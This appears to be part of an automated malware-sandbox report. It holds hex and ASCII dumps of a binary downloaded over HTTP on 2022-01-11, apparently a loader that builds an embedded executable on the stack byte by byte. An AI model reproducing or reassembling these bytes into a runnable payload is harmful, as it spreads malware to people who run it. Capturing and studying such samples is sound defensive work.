                                                                                                                                  2022-01-11 22:39:05 UTC1346INData Raw: 0d eb 53 8b 85 24 fe ff ff 33 c9 66 89 08 8b 85 2c fe ff ff 8b 8d 1c fe ff ff 53 ff 75 10 8b 00 ff b5 14 fe ff ff 89 01 e8 86 53 00 00 83 c4 0c 85 c0 75 22 eb 04 33 c0 8b d8 8d 8d 04 fe ff ff e8 64 f7 ff ff 8b c3 8b 4d fc 5f 5e 33 cd 5b e8 43 64 ff ff c9 c3 33 c0 50 50 50 50 50 e8 62 a0 ff ff cc 8b ff 55 8b ec 53 33 db 56 8b f3 39 5d 10 7e 22 57 8d 7d 10 8d 7f 04 ff 37 ff 75 0c ff 75 08 e8 74 91 00 00 83 c4 0c 85 c0 75 0b 46 3b 75 10 7c e3 5f 5e 5b 5d c3 53 53 53 53 53 e8 21 a0 ff ff cc 8b ff 55 8b ec 83 ec 28 83 65 f4 00 83 65 f0 00 83 7d 08 05 76 14 e8 04 cb ff ff c7 00 16 00 00 00 e8 cd 9f ff ff 33 c0 c9 c3 e8 85 1f 00 00 89 45 f8 e8 d1 32 00 00 e8 e8 b8 00 00 8b 45 f8 8d 4d ff 83 88 50 03 00 00 10 8d 45 f8 89 45 ec 8d 45 f0 89 45 d8 8d 45 f8 89 45 dc
                                                                                                                                  Data Ascii: S$3f,SuSu"3dM_^3[Cd3PPPPPbUS3V9]~"W}7uutuF;u|_^[]SSSSS!U(ee}v3E2EMPEEEEEE
                                                                                                                                  2022-01-11 22:39:05 UTC1362INData Raw: 88 06 0f b6 c2 83 f0 01 03 c7 03 f0 83 c8 ff 39 45 0c 74 07 8b c3 2b c6 03 45 0c 68 a8 15 47 00 50 56 e8 64 d3 ff ff 83 c4 0c 5b 85 c0 75 76 8d 4e 02 38 45 14 74 03 c6 06 45 8b 55 1c 8b 42 08 80 38 30 74 2f 8b 52 04 83 ea 01 79 06 f7 da c6 46 01 2d 6a 64 5f 3b d7 7c 08 8b c2 99 f7 ff 00 46 02 6a 0a 5f 3b d7 7c 08 8b c2 99 f7 ff 00 46 03 00 56 04 83 7d 18 02 75 14 80 39 30 75 0f 6a 03 8d 41 01 50 51 e8 ed 32 ff ff 83 c4 0c 80 7d fc 00 74 0a 8b 45 f0 83 a0 50 03 00 00 fd 33 c0 e9 f5 fe ff ff 33 c0 50 50 50 50 50 e8 13 60 ff ff cc 8b ff 55 8b ec 83 ec 0c 33 c0 56 57 ff 75 18 8d 7d f4 ff 75 14 ab ab ab 8d 45 f4 8b 7d 1c 50 8b 45 08 57 ff 70 04 ff 30 e8 09 97 00 00 83 c9 ff 83 c4 18 8b d0 39 4d 10 74 0e 8b 4d 10 33 c0 83 7d f4 2d 0f 94 c0 2b c8 ff 75 24 8b 75
                                                                                                                                  Data Ascii: 9Et+EhGPVd[uvN8EtEUB80t/RyF-jd_;|Fj_;|FV}u90ujAPQ2}tEP33PPPPP`U3VWu}uE}PEWp09MtM3}-+u$u
                                                                                                                                  2022-01-11 22:39:05 UTC1378INData Raw: 00 00 73 03 d9 ee c3 dd 05 f0 1a 47 00 c3 f2 0f 58 d2 f2 0f 10 c2 ba ee 03 00 00 eb 59 66 0f 7e e0 66 0f 73 d4 20 66 0f 7e e2 81 e2 ff ff ff 7f 8b c8 0b c2 66 0f 12 05 90 1a 47 00 ba 1a 00 00 00 83 f8 00 74 30 66 0f 7e e0 ba 1d 00 00 00 25 ff ff ff 7f 3d 00 00 f0 7f 77 1b 72 05 83 f9 00 77 14 83 ec 10 66 0f 13 44 24 04 dd 44 24 04 83 c4 10 c3 d9 e8 c3 83 ec 1c 66 0f 13 44 24 10 89 54 24 0c 8b d4 83 c2 10 89 54 24 08 83 c2 18 89 54 24 04 83 ea 08 89 14 24 e8 84 74 00 00 dd 44 24 10 83 c4 1c c3 83 f8 00 7e 28 3d 00 00 04 00 0f 83 3c 02 00 00 56 8b d0 83 e0 7f 81 c1 00 ff 03 00 81 ea 80 00 00 00 83 e2 80 57 bf f0 3f 00 00 eb 26 3d 00 02 fc ff 0f 8e f1 01 00 00 56 8b d0 83 e0 7f 81 c1 80 00 00 00 83 e2 80 81 c2 80 fe 03 00 57 bf 00 00 00 00 f2 0f 58 e0 f2 0f
                                                                                                                                  Data Ascii: sGXYf~fs f~fGt0f~%=wrwfD$D$fD$T$T$T$$tD$~(=<VW?&=VWX
                                                                                                                                  2022-01-11 22:39:05 UTC1394INData Raw: 00 00 00 b9 00 2a 47 00 8b c6 66 8b 10 66 3b 11 75 1e 66 85 d2 74 15 66 8b 50 02 66 3b 51 02 75 0f 83 c0 04 83 c1 04 66 85 d2 75 de 8b c7 eb 05 1b c0 83 c8 01 85 c0 0f 84 8d 00 00 00 68 f4 29 47 00 56 e8 04 d0 ff ff 59 59 85 c0 74 6a 68 08 2a 47 00 56 e8 f3 cf ff ff 59 59 85 c0 74 59 b9 14 2a 47 00 8b c6 66 8b 10 66 3b 11 75 1c 66 85 d2 74 1c 66 8b 50 02 66 3b 51 02 75 0d 83 c0 04 83 c1 04 66 85 d2 75 de eb 05 1b ff 83 cf 01 85 ff 75 2e 6a 02 8d 45 fc 50 68 0b 00 00 20 8b 45 0c 05 50 02 00 00 50 e8 2a 71 ff ff 85 c0 74 27 8b 45 fc 83 f8 03 7d 05 b8 e9 fd 00 00 5f 5e c9 c3 56 e8 7a 5b ff ff 59 eb f3 6a 02 8d 45 fc 50 68 04 10 00 20 eb c7 33 c0 eb e2 8b ff 55 8b ec 83 ec 18 a1 2c c0 47 00 33 c5 89 45 fc 56 8b 75 08 8d 45 e8 6a 09 50 6a 59 56 e8 d7 70 ff ff
                                                                                                                                  Data Ascii: *Gff;uftfPf;Qufuh)GVYYtjh*GVYYtY*Gff;uftfPf;Qufuu.jEPh EPP*qt'E}_^Vz[YjEPh 3U,G3EVuEjPjYVp
                                                                                                                                  2022-01-11 22:39:05 UTC1410INData Raw: 50 ff 75 0c e8 7a e7 fe ff 8b 75 f0 83 c4 0c 85 c0 75 0c 56 ff 75 d8 ff 15 30 d0 46 00 8b d8 80 7d fc 00 74 07 56 e8 dc 22 ff ff 59 80 7d e4 00 74 09 ff 75 d8 e8 cd 22 ff ff 59 5e 8b c3 5b c9 c3 8b ff 55 8b ec 51 51 8b 4d 08 33 c0 53 8b 5d 0c 56 57 89 5d fc 89 45 f8 38 45 18 74 14 6a 2d 58 66 89 03 8d 43 02 89 45 fc 33 c0 40 f7 d9 89 45 f8 8b 5d fc 8b 75 f8 89 5d fc 33 d2 8b c1 f7 75 14 6a 09 8b c8 8b fb 8d 43 02 89 45 f8 58 3b c2 1b c0 83 e0 27 83 c0 30 66 03 c2 8b 55 f8 46 66 89 03 8b 45 10 85 c9 74 06 8b da 3b f0 72 cb 8b 5d 0c 3b f0 8b 75 fc 72 18 33 c0 66 89 03 e8 ff ca fe ff 6a 22 5e 89 30 e8 c9 9f fe ff 8b c6 eb 1d 33 c0 66 89 02 66 8b 06 0f b7 0f 66 89 07 83 ef 02 66 89 0e 83 c6 02 3b f7 72 ea 33 c0 5f 5e 5b c9 c3 8b ff 55 8b ec 8b 4d 0c 56 85 c9
                                                                                                                                  Data Ascii: PuzuuVu0F}tV"Y}tu"Y^[UQQM3S]VW]E8Etj-XfCE3@E]u]3ujCEX;'0fUFfEt;r];ur3fj"^03ffff;r3_^[UMV
                                                                                                                                  2022-01-11 22:39:05 UTC1426INData Raw: ff 00 c6 85 25 5e ff ff 00 c6 85 26 5e ff ff 00 c6 85 27 5e ff ff 00 c6 85 28 5e ff ff 00 c6 85 29 5e ff ff 00 c6 85 2a 5e ff ff 00 c6 85 2b 5e ff ff 00 c6 85 2c 5e ff ff 00 c6 85 2d 5e ff ff 00 c6 85 2e 5e ff ff 00 c6 85 2f 5e ff ff 00 c6 85 30 5e ff ff 00 c6 85 31 5e ff ff 00 c6 85 32 5e ff ff 00 c6 85 33 5e ff ff 00 c6 85 34 5e ff ff 00 c6 85 35 5e ff ff 00 c6 85 36 5e ff ff 00 c6 85 37 5e ff ff 00 c6 85 38 5e ff ff 00 c6 85 39 5e ff ff 00 c6 85 3a 5e ff ff 00 c6 85 3b 5e ff ff 00 c6 85 3c 5e ff ff 00 c6 85 3d 5e ff ff 00 c6 85 3e 5e ff ff 00 c6 85 3f 5e ff ff 00 c6 85 40 5e ff ff c3 c6 85 41 5e ff ff 8d c6 85 42 5e ff ff b4 c6 85 43 5e ff ff 26 c6 85 44 5e ff ff 00 c6 85 45 5e ff ff 00 c6 85 46 5e ff ff 00 c6 85 47 5e ff ff 00 c6 85 48 5e ff ff 8d c6
                                                                                                                                  Data Ascii: %^&^'^(^)^*^+^,^-^.^/^0^1^2^3^4^5^6^7^8^9^:^;^<^=^>^?^@^A^B^C^&D^E^F^G^H^
                                                                                                                                  2022-01-11 22:39:05 UTC1442INData Raw: 49 67 ff ff c3 c6 85 4a 67 ff ff 40 c6 85 4b 67 ff ff 00 c6 85 4c 67 ff ff e9 c6 85 4d 67 ff ff 1f c6 85 4e 67 ff ff fd c6 85 4f 67 ff ff ff c6 85 50 67 ff ff ff c6 85 51 67 ff ff 8d c6 85 52 67 ff ff b4 c6 85 53 67 ff ff 26 c6 85 54 67 ff ff 00 c6 85 55 67 ff ff 00 c6 85 56 67 ff ff 00 c6 85 57 67 ff ff 00 c6 85 58 67 ff ff ba c6 85 59 67 ff ff 9e c6 85 5a 67 ff ff b1 c6 85 5b 67 ff ff 40 c6 85 5c 67 ff ff 00 c6 85 5d 67 ff ff e9 c6 85 5e 67 ff ff 0e c6 85 5f 67 ff ff fd c6 85 60 67 ff ff ff c6 85 61 67 ff ff ff c6 85 62 67 ff ff 8d c6 85 63 67 ff ff b6 c6 85 64 67 ff ff 00 c6 85 65 67 ff ff 00 c6 85 66 67 ff ff 00 c6 85 67 67 ff ff 00 c6 85 68 67 ff ff ba c6 85 69 67 ff ff a4 c6 85 6a 67 ff ff b1 c6 85 6b 67 ff ff 40 c6 85 6c 67 ff ff 00 c6 85 6d 67 ff
                                                                                                                                  Data Ascii: IgJg@KgLgMgNgOgPgQgRgSg&TgUgVgWgXgYgZg[g@\g]g^g_g`gagbgcgdgegfggghgigjgkg@lgmg
                                                                                                                                  2022-01-11 22:39:05 UTC1458INData Raw: 04 c6 85 6e 70 ff ff 30 c6 85 6f 70 ff ff 89 c6 85 70 70 ff ff 04 c6 85 71 70 ff ff 24 c6 85 72 70 ff ff e8 c6 85 73 70 ff ff e9 c6 85 74 70 ff ff 75 c6 85 75 70 ff ff 00 c6 85 76 70 ff ff 00 c6 85 77 70 ff ff 89 c6 85 78 70 ff ff 44 c6 85 79 70 ff ff 24 c6 85 7a 70 ff ff 34 c6 85 7b 70 ff ff ff c6 85 7c 70 ff ff d3 c6 85 7d 70 ff ff 8b c6 85 7e 70 ff ff 54 c6 85 7f 70 ff ff 24 c6 85 80 70 ff ff 34 c6 85 81 70 ff ff 8b c6 85 82 70 ff ff 00 c6 85 83 70 ff ff 3b c6 85 84 70 ff ff 14 c6 85 85 70 ff ff 30 c6 85 86 70 ff ff 0f c6 85 87 70 ff ff 84 c6 85 88 70 ff ff e4 c6 85 89 70 ff ff 07 c6 85 8a 70 ff ff 00 c6 85 8b 70 ff ff 00 c6 85 8c 70 ff ff ff c6 85 8d 70 ff ff d3 c6 85 8e 70 ff ff c7 c6 85 8f 70 ff ff 44 c6 85 90 70 ff ff 24 c6 85 91 70 ff ff 04 c6 85
                                                                                                                                  Data Ascii: np0opppqp$rpsptpuupvpwpxpDyp$zp4{p|p}p~pTp$p4ppp;pp0ppppppppppDp$p
                                                                                                                                  2022-01-11 22:39:05 UTC1474INData Raw: 79 ff ff 0c c6 85 93 79 ff ff c7 c6 85 94 79 ff ff 44 c6 85 95 79 ff ff 24 c6 85 96 79 ff ff 04 c6 85 97 79 ff ff 0e c6 85 98 79 ff ff 80 c6 85 99 79 ff ff 00 c6 85 9a 79 ff ff 00 c6 85 9b 79 ff ff 89 c6 85 9c 79 ff ff 44 c6 85 9d 79 ff ff 24 c6 85 9e 79 ff ff 08 c6 85 9f 79 ff ff 89 c6 85 a0 79 ff ff 3c c6 85 a1 79 ff ff 24 c6 85 a2 79 ff ff ff c6 85 a3 79 ff ff 15 c6 85 a4 79 ff ff d8 c6 85 a5 79 ff ff 13 c6 85 a6 79 ff ff 41 c6 85 a7 79 ff ff 00 c6 85 a8 79 ff ff 83 c6 85 a9 79 ff ff ec c6 85 aa 79 ff ff 10 c6 85 ab 79 ff ff 85 c6 85 ac 79 ff ff c0 c6 85 ad 79 ff ff 0f c6 85 ae 79 ff ff 84 c6 85 af 79 ff ff 40 c6 85 b0 79 ff ff 03 c6 85 b1 79 ff ff 00 c6 85 b2 79 ff ff 00 c6 85 b3 79 ff ff c7 c6 85 b4 79 ff ff 44 c6 85 b5 79 ff ff 24 c6 85 b6 79 ff ff
                                                                                                                                  Data Ascii: yyyDy$yyyyyyyDy$yyy<y$yyyyyAyyyyyyyyy@yyyyyDy$y
                                                                                                                                  2022-01-11 22:39:05 UTC1490INData Raw: c6 85 b7 82 ff ff 83 c6 85 b8 82 ff ff c4 c6 85 b9 82 ff ff 30 c6 85 ba 82 ff ff 5b c6 85 bb 82 ff ff 5e c6 85 bc 82 ff ff 5f c6 85 bd 82 ff ff c3 c6 85 be 82 ff ff 66 c6 85 bf 82 ff ff 90 c6 85 c0 82 ff ff 83 c6 85 c1 82 ff ff f8 c6 85 c2 82 ff ff 02 c6 85 c3 82 ff ff ba c6 85 c4 82 ff ff 40 c6 85 c5 82 ff ff 00 c6 85 c6 82 ff ff 00 c6 85 c7 82 ff ff 00 c6 85 c8 82 ff ff b8 c6 85 c9 82 ff ff 04 c6 85 ca 82 ff ff 00 c6 85 cb 82 ff ff 00 c6 85 cc 82 ff ff 00 c6 85 cd 82 ff ff 8b c6 85 ce 82 ff ff 4c c6 85 cf 82 ff ff 24 c6 85 d0 82 ff ff 20 c6 85 d1 82 ff ff 0f c6 85 d2 82 ff ff 45 c6 85 d3 82 ff ff c2 c6 85 d4 82 ff ff 8b c6 85 d5 82 ff ff 54 c6 85 d6 82 ff ff 24 c6 85 d7 82 ff ff 14 c6 85 d8 82 ff ff 03 c6 85 d9 82 ff ff 1d c6 85 da 82 ff ff b0 c6 85 db
                                                                                                                                  Data Ascii: 0[^_f@L$ ET$
                                                                                                                                  2022-01-11 22:39:05 UTC1506INData Raw: ff ff 5e c6 85 dc 8b ff ff c3 c6 85 dd 8b ff ff 8d c6 85 de 8b ff ff 76 c6 85 df 8b ff ff 00 c6 85 e0 8b ff ff 31 c6 85 e1 8b ff ff c0 c6 85 e2 8b ff ff 66 c6 85 e3 8b ff ff 81 c6 85 e4 8b ff ff 3d c6 85 e5 8b ff ff 00 c6 85 e6 8b ff ff 00 c6 85 e7 8b ff ff 40 c6 85 e8 8b ff ff 00 c6 85 e9 8b ff ff 4d c6 85 ea 8b ff ff 5a c6 85 eb 8b ff ff 75 c6 85 ec 8b ff ff 12 c6 85 ed 8b ff ff 8b c6 85 ee 8b ff ff 15 c6 85 ef 8b ff ff 3c c6 85 f0 8b ff ff 00 c6 85 f1 8b ff ff 40 c6 85 f2 8b ff ff 00 c6 85 f3 8b ff ff 81 c6 85 f4 8b ff ff ba c6 85 f5 8b ff ff 00 c6 85 f6 8b ff ff 00 c6 85 f7 8b ff ff 40 c6 85 f8 8b ff ff 00 c6 85 f9 8b ff ff 50 c6 85 fa 8b ff ff 45 c6 85 fb 8b ff ff 00 c6 85 fc 8b ff ff 00 c6 85 fd 8b ff ff 74 c6 85 fe 8b ff ff 01 c6 85 ff 8b ff ff c3
                                                                                                                                  Data Ascii: ^v1f=@MZu<@@PEt
                                                                                                                                  2022-01-11 22:39:05 UTC1522INData Raw: 85 00 95 ff ff 29 c6 85 01 95 ff ff f1 c6 85 02 95 ff ff 89 c6 85 03 95 ff ff 4b c6 85 04 95 ff ff 08 c6 85 05 95 ff ff 78 c6 85 06 95 ff ff 0b c6 85 07 95 ff ff 8b c6 85 08 95 ff ff 43 c6 85 09 95 ff ff 0c c6 85 0a 95 ff ff 39 c6 85 0b 95 ff ff c1 c6 85 0c 95 ff ff 0f c6 85 0d 95 ff ff 8f c6 85 0e 95 ff ff 8c c6 85 0f 95 ff ff 01 c6 85 10 95 ff ff 00 c6 85 11 95 ff ff 00 c6 85 12 95 ff ff c7 c6 85 13 95 ff ff 43 c6 85 14 95 ff ff 08 c6 85 15 95 ff ff ff c6 85 16 95 ff ff ff c6 85 17 95 ff ff ff c6 85 18 95 ff ff ff c6 85 19 95 ff ff b9 c6 85 1a 95 ff ff ff c6 85 1b 95 ff ff ff c6 85 1c 95 ff ff ff c6 85 1d 95 ff ff ff c6 85 1e 95 ff ff f6 c6 85 1f 95 ff ff 43 c6 85 20 95 ff ff 05 c6 85 21 95 ff ff 10 c6 85 22 95 ff ff 74 c6 85 23 95 ff ff 4c c6 85 24 95
                                                                                                                                  Data Ascii: )KxC9CC !"t#L$
                                                                                                                                  2022-01-11 22:39:05 UTC1538INData Raw: ff 00 c6 85 25 9e ff ff 00 c6 85 26 9e ff ff 00 c6 85 27 9e ff ff 00 c6 85 28 9e ff ff 0f c6 85 29 9e ff ff b6 c6 85 2a 9e ff ff 45 c6 85 2b 9e ff ff c4 c6 85 2c 9e ff ff c6 c6 85 2d 9e ff ff 46 c6 85 2e 9e ff ff 01 c6 85 2f 9e ff ff 30 c6 85 30 9e ff ff 83 c6 85 31 9e ff ff c6 c6 85 32 9e ff ff 02 c6 85 33 9e ff ff 88 c6 85 34 9e ff ff 46 c6 85 35 9e ff ff fe c6 85 36 9e ff ff e9 c6 85 37 9e ff ff 7f c6 85 38 9e ff ff fc c6 85 39 9e ff ff ff c6 85 3a 9e ff ff ff c6 85 3b 9e ff ff 89 c6 85 3c 9e ff ff f8 c6 85 3d 9e ff ff 25 c6 85 3e 9e ff ff 00 c6 85 3f 9e ff ff 06 c6 85 40 9e ff ff 00 c6 85 41 9e ff ff 00 c6 85 42 9e ff ff 3d c6 85 43 9e ff ff 00 c6 85 44 9e ff ff 02 c6 85 45 9e ff ff 00 c6 85 46 9e ff ff 00 c6 85 47 9e ff ff 0f c6 85 48 9e ff ff 85 c6
                                                                                                                                  Data Ascii: %&'()*E+,-F./001234F56789:;<=%>?@AB=CDEFGH
                                                                                                                                  2022-01-11 22:39:05 UTC1554INData Raw: 49 a7 ff ff b8 c6 85 4a a7 ff ff 30 c6 85 4b a7 ff ff 00 c6 85 4c a7 ff ff 00 c6 85 4d a7 ff ff 00 c6 85 4e a7 ff ff e8 c6 85 4f a7 ff ff 5d c6 85 50 a7 ff ff e7 c6 85 51 a7 ff ff ff c6 85 52 a7 ff ff ff c6 85 53 a7 ff ff 8b c6 85 54 a7 ff ff 43 c6 85 55 a7 ff ff 04 c6 85 56 a7 ff ff 89 c6 85 57 a7 ff ff da c6 85 58 a7 ff ff 83 c6 85 59 a7 ff ff e0 c6 85 5a a7 ff ff 20 c6 85 5b a7 ff ff 83 c6 85 5c a7 ff ff c8 c6 85 5d a7 ff ff 58 c6 85 5e a7 ff ff e8 c6 85 5f a7 ff ff 4d c6 85 60 a7 ff ff e7 c6 85 61 a7 ff ff ff c6 85 62 a7 ff ff ff c6 85 63 a7 ff ff 8b c6 85 64 a7 ff ff 43 c6 85 65 a7 ff ff 08 c6 85 66 a7 ff ff 85 c6 85 67 a7 ff ff c0 c6 85 68 a7 ff ff 7e c6 85 69 a7 ff ff 2f c6 85 6a a7 ff ff f6 c6 85 6b a7 ff ff 43 c6 85 6c a7 ff ff 05 c6 85 6d a7 ff
                                                                                                                                  Data Ascii: IJ0KLMNO]PQRSTCUVWXYZ [\]X^_M`abcdCefgh~i/jkClm
                                                                                                                                  2022-01-11 22:39:05 UTC1570INData Raw: 24 c6 85 6e b0 ff ff 20 c6 85 6f b0 ff ff 03 c6 85 70 b0 ff ff 89 c6 85 71 b0 ff ff 10 c6 85 72 b0 ff ff 0f c6 85 73 b0 ff ff 85 c6 85 74 b0 ff ff c8 c6 85 75 b0 ff ff fe c6 85 76 b0 ff ff ff c6 85 77 b0 ff ff ff c6 85 78 b0 ff ff 89 c6 85 79 b0 ff ff d3 c6 85 7a b0 ff ff c1 c6 85 7b b0 ff ff fb c6 85 7c b0 ff ff 1f c6 85 7d b0 ff ff 89 c6 85 7e b0 ff ff 58 c6 85 7f b0 ff ff 04 c6 85 80 b0 ff ff e9 c6 85 81 b0 ff ff bb c6 85 82 b0 ff ff fe c6 85 83 b0 ff ff ff c6 85 84 b0 ff ff ff c6 85 85 b0 ff ff 8d c6 85 86 b0 ff ff 76 c6 85 87 b0 ff ff 00 c6 85 88 b0 ff ff 0f c6 85 89 b0 ff ff b7 c6 85 8a b0 ff ff 43 c6 85 8b b0 ff ff 02 c6 85 8c b0 ff ff 83 c6 85 8d b0 ff ff 4c c6 85 8e b0 ff ff 24 c6 85 8f b0 ff ff 58 c6 85 90 b0 ff ff 04 c6 85 91 b0 ff ff 89 c6 85
                                                                                                                                  Data Ascii: $n opqrstuvwxyz{|}~XvCL$X
                                                                                                                                  2022-01-11 22:39:05 UTC1586INData Raw: b9 ff ff b4 c6 85 93 b9 ff ff 24 c6 85 94 b9 ff ff d0 c6 85 95 b9 ff ff 00 c6 85 96 b9 ff ff 00 c6 85 97 b9 ff ff 00 c6 85 98 b9 ff ff 8b c6 85 99 b9 ff ff 8c c6 85 9a b9 ff ff 24 c6 85 9b b9 ff ff dc c6 85 9c b9 ff ff 00 c6 85 9d b9 ff ff 00 c6 85 9e b9 ff ff 00 c6 85 9f b9 ff ff 8b c6 85 a0 b9 ff ff bc c6 85 a1 b9 ff ff 24 c6 85 a2 b9 ff ff c0 c6 85 a3 b9 ff ff 00 c6 85 a4 b9 ff ff 00 c6 85 a5 b9 ff ff 00 c6 85 a6 b9 ff ff 89 c6 85 a7 b9 ff ff 44 c6 85 a8 b9 ff ff 24 c6 85 a9 b9 ff ff 28 c6 85 aa b9 ff ff 8b c6 85 ab b9 ff ff 84 c6 85 ac b9 ff ff 24 c6 85 ad b9 ff ff c8 c6 85 ae b9 ff ff 00 c6 85 af b9 ff ff 00 c6 85 b0 b9 ff ff 00 c6 85 b1 b9 ff ff 89 c6 85 b2 b9 ff ff 74 c6 85 b3 b9 ff ff 24 c6 85 b4 b9 ff ff 18 c6 85 b5 b9 ff ff 8b c6 85 b6 b9 ff ff
                                                                                                                                  Data Ascii: $$$D$($t$
                                                                                                                                  2022-01-11 22:39:05 UTC1602INData Raw: c6 85 b7 c2 ff ff 44 c6 85 b8 c2 ff ff 24 c6 85 b9 c2 ff ff 2c c6 85 ba c2 ff ff 20 c6 85 bb c2 ff ff 00 c6 85 bc c2 ff ff 00 c6 85 bd c2 ff ff 00 c6 85 be c2 ff ff 8b c6 85 bf c2 ff ff 44 c6 85 c0 c2 ff ff 24 c6 85 c1 c2 ff ff 38 c6 85 c2 c2 ff ff 89 c6 85 c3 c2 ff ff 04 c6 85 c4 c2 ff ff 24 c6 85 c5 c2 ff ff e8 c6 85 c6 c2 ff ff f6 c6 85 c7 c2 ff ff 11 c6 85 c8 c2 ff ff 00 c6 85 c9 c2 ff ff 00 c6 85 ca c2 ff ff 85 c6 85 cb c2 ff ff ff c6 85 cc c2 ff ff 74 c6 85 cd c2 ff ff 08 c6 85 ce c2 ff ff 89 c6 85 cf c2 ff ff 3c c6 85 d0 c2 ff ff 24 c6 85 d1 c2 ff ff e8 c6 85 d2 c2 ff ff ea c6 85 d3 c2 ff ff 11 c6 85 d4 c2 ff ff 00 c6 85 d5 c2 ff ff 00 c6 85 d6 c2 ff ff 89 c6 85 d7 c2 ff ff 2c c6 85 d8 c2 ff ff 24 c6 85 d9 c2 ff ff e8 c6 85 da c2 ff ff e2 c6 85 db
                                                                                                                                  Data Ascii: D$, D$8$t<$,$
                                                                                                                                  2022-01-11 22:39:05 UTC1618INData Raw: ff ff ca c6 85 dc cb ff ff dd c6 85 dd cb ff ff da c6 85 de cb ff ff d9 c6 85 df cb ff ff 05 c6 85 e0 cb ff ff 14 c6 85 e1 cb ff ff c8 c6 85 e2 cb ff ff 40 c6 85 e3 cb ff ff 00 c6 85 e4 cb ff ff d9 c6 85 e5 cb ff ff c1 c6 85 e6 cb ff ff d8 c6 85 e7 cb ff ff c1 c6 85 e8 cb ff ff d9 c6 85 e9 cb ff ff cb c6 85 ea cb ff ff db c6 85 eb cb ff ff f3 c6 85 ec cb ff ff dd c6 85 ed cb ff ff db c6 85 ee cb ff ff 0f c6 85 ef cb ff ff 87 c6 85 f0 cb ff ff a7 c6 85 f1 cb ff ff 03 c6 85 f2 cb ff ff 00 c6 85 f3 cb ff ff 00 c6 85 f4 cb ff ff de c6 85 f5 cb ff ff e1 c6 85 f6 cb ff ff df c6 85 f7 cb ff ff f1 c6 85 f8 cb ff ff 0f c6 85 f9 cb ff ff 86 c6 85 fa cb ff ff ef c6 85 fb cb ff ff f7 c6 85 fc cb ff ff ff c6 85 fd cb ff ff ff c6 85 fe cb ff ff d9 c6 85 ff cb ff ff ee
                                                                                                                                  Data Ascii: @
                                                                                                                                  2022-01-11 22:39:05 UTC1634INData Raw: 85 00 d5 ff ff 13 c6 85 01 d5 ff ff 74 c6 85 02 d5 ff ff 0d c6 85 03 d5 ff ff 83 c6 85 04 d5 ff ff c4 c6 85 05 d5 ff ff 18 c6 85 06 d5 ff ff 5b c6 85 07 d5 ff ff c3 c6 85 08 d5 ff ff 8d c6 85 09 d5 ff ff b4 c6 85 0a d5 ff ff 26 c6 85 0b d5 ff ff 00 c6 85 0c d5 ff ff 00 c6 85 0d d5 ff ff 00 c6 85 0e d5 ff ff 00 c6 85 0f d5 ff ff 90 c6 85 10 d5 ff ff c7 c6 85 11 d5 ff ff 04 c6 85 12 d5 ff ff 24 c6 85 13 d5 ff ff 60 c6 85 14 d5 ff ff 0e c6 85 15 d5 ff ff 41 c6 85 16 d5 ff ff 00 c6 85 17 d5 ff ff ff c6 85 18 d5 ff ff 15 c6 85 19 d5 ff ff 9c c6 85 1a d5 ff ff 12 c6 85 1b d5 ff ff 41 c6 85 1c d5 ff ff 00 c6 85 1d d5 ff ff 83 c6 85 1e d5 ff ff ec c6 85 1f d5 ff ff 04 c6 85 20 d5 ff ff eb c6 85 21 d5 ff ff e1 c6 85 22 d5 ff ff 8d c6 85 23 d5 ff ff b4 c6 85 24 d5
                                                                                                                                  Data Ascii: t[&$`AA !"#$
                                                                                                                                  2022-01-11 22:39:05 UTC1650INData Raw: ff 8d c6 85 25 de ff ff 70 c6 85 26 de ff ff 14 c6 85 27 de ff ff 8b c6 85 28 de ff ff 40 c6 85 29 de ff ff 10 c6 85 2a de ff ff 8d c6 85 2b de ff ff 1c c6 85 2c de ff ff 86 c6 85 2d de ff ff 8b c6 85 2e de ff ff 53 c6 85 2f de ff ff fc c6 85 30 de ff ff 8d c6 85 31 de ff ff 6b c6 85 32 de ff ff fc c6 85 33 de ff ff 0f c6 85 34 de ff ff bd c6 85 35 de ff ff c2 c6 85 36 de ff ff 83 c6 85 37 de ff ff f0 c6 85 38 de ff ff 1f c6 85 39 de ff ff 29 c6 85 3a de ff ff c7 c6 85 3b de ff ff 89 c6 85 3c de ff ff 39 c6 85 3d de ff ff 83 c6 85 3e de ff ff f8 c6 85 3f de ff ff 0a c6 85 40 de ff ff 7e c6 85 41 de ff ff 4e c6 85 42 de ff ff 83 c6 85 43 de ff ff e8 c6 85 44 de ff ff 0b c6 85 45 de ff ff 39 c6 85 46 de ff ff ee c6 85 47 de ff ff 73 c6 85 48 de ff ff 27 c6
                                                                                                                                  Data Ascii: %p&'(@)*+,-.S/01k23456789):;<9=>?@~ANBCDE9FGsH'
                                                                                                                                  2022-01-11 22:39:05 UTC1666INData Raw: 49 e7 ff ff 80 c6 85 4a e7 ff ff 98 c6 85 4b e7 ff ff 40 c6 85 4c e7 ff ff 00 c6 85 4d e7 ff ff a3 c6 85 4e e7 ff ff 50 c6 85 4f e7 ff ff a0 c6 85 50 e7 ff ff 40 c6 85 51 e7 ff ff 00 c6 85 52 e7 ff ff 83 c6 85 53 e7 ff ff c4 c6 85 54 e7 ff ff 14 c6 85 55 e7 ff ff 5b c6 85 56 e7 ff ff 5e c6 85 57 e7 ff ff ff c6 85 58 e7 ff ff e0 c6 85 59 e7 ff ff 8d c6 85 5a e7 ff ff b4 c6 85 5b e7 ff ff 26 c6 85 5c e7 ff ff 00 c6 85 5d e7 ff ff 00 c6 85 5e e7 ff ff 00 c6 85 5f e7 ff ff 00 c6 85 60 e7 ff ff c7 c6 85 61 e7 ff ff 44 c6 85 62 e7 ff ff 24 c6 85 63 e7 ff ff 04 c6 85 64 e7 ff ff aa c6 85 65 e7 ff ff c9 c6 85 66 e7 ff ff 40 c6 85 67 e7 ff ff 00 c6 85 68 e7 ff ff 89 c6 85 69 e7 ff ff 1c c6 85 6a e7 ff ff 24 c6 85 6b e7 ff ff ff c6 85 6c e7 ff ff d6 c6 85 6d e7 ff
                                                                                                                                  Data Ascii: IJK@LMNPOP@QRSTU[V^WXYZ[&\]^_`aDb$cdef@ghij$klm
